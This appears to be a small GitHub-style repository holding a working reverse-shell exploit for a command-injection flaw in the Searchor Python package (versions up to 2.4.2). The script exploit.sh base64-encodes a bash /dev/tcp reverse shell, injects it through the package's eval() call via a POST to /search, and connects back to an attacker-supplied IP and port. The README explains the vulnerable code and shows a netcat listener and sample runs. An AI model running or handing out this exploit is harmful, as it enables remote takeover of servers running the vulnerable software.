├── exploit.sh
└── README.md


/exploit.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash -
 2 | 
 3 | default_port="9001"
 4 | port="${3:-$default_port}"
 5 | rev_shell_b64=$(echo -ne "bash  -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64)
 6 | evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment"
 7 | plus="+"
 8 | 
 9 | echo "---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---"
10 | 
11 | if [ -z "${evil_cmd##*$plus*}" ]
12 | then
13 |     evil_cmd=$(echo ${evil_cmd} | sed -r 's/[+]+/%2B/g')
14 | fi
15 | 
16 | if [ $# -ne 0 ]
17 | then
18 |     echo "[*] Input target is $1"
19 |     echo "[*] Input attacker is $2:${port}"
20 |     echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection"
21 |     curl -s -X POST $1/search -d "engine=Google&query=${evil_cmd}" 1> /dev/null
22 | else 
23 |     echo "[!] Please specify a IP address of target and IP address/Port of attacker for Reverse Shell, for example: 
24 | 
25 | ./exploit.sh <TARGET> <ATTACKER> <PORT> [9001 by default]"
26 | fi
27 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # POC exploit for Searchor <= 2.4.2 (2.4.0) (Arbitrary CMD Injection)
 3 | Reverse Shell POC exploit for **`Searchor <= 2.4.2 (2.4.0)`**
 4 | 
 5 | See for small details about the vulnerability [**here**](https://security.snyk.io/package/pip/searchor/2.4.0)
 6 | 
 7 | [**Link**](https://github.com/ArjunSharda/Searchor) for Github project of Searchor
 8 | 
 9 | ## Small explanation
10 | In file **`src/sarchor/main.py`** of **`Searchor <= 2.4.2`** there is a function call **`eval()`**:
11 | ```python
12 | @click.argument("query")
13 | def search(engine, query, open, copy):
14 |     try:
15 |         url = eval( # <<< See here 
16 |             f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
17 |         )
18 |         click.echo(url)
19 |         searchor.history.update(engine, query, url)
20 |         if open:
21 |             click.echo("opening browser...")
22 | 	  ...
23 | ```
24 | Which can provide the ability to execute arbitrary code using functions such as:
25 | * `__import__('os').system('<CMD>')`
26 | * `__import__('os').popen('<CMD>').read() `
27 | * `etc`
28 | 
29 | ## PoC
30 | 
31 | Run the netcat on your host:
32 | ``` 
33 | $ nc -lvnp 9001
34 | ``` 
35 | 
36 | Run the exploit (example) with default port **`9001`** on attacker host:
37 | ``` 
38 | $ ./exploit.sh site.com 10.10.14.122
39 | ---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---
40 | [*] Input target is site.com
41 | [*] Input attacker is 10.10.14.122:9001
42 | [*] Run the Reverse Shell... Press Ctrl+C after successful connection
43 | ```
44 | Run the exploit (example) with the specified port **`1337`** on attacker host:
45 | ``` 
46 | $ ./exploit.sh site.com 10.10.14.122 1337
47 | ---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---
48 | [*] Input target is site.com
49 | [*] Input attacker is 10.10.14.122:1337
50 | [*] Run the Reverse Shell... Press Ctrl+C after successful connection
51 | ```
52 | 


--------------------------------------------------------------------------------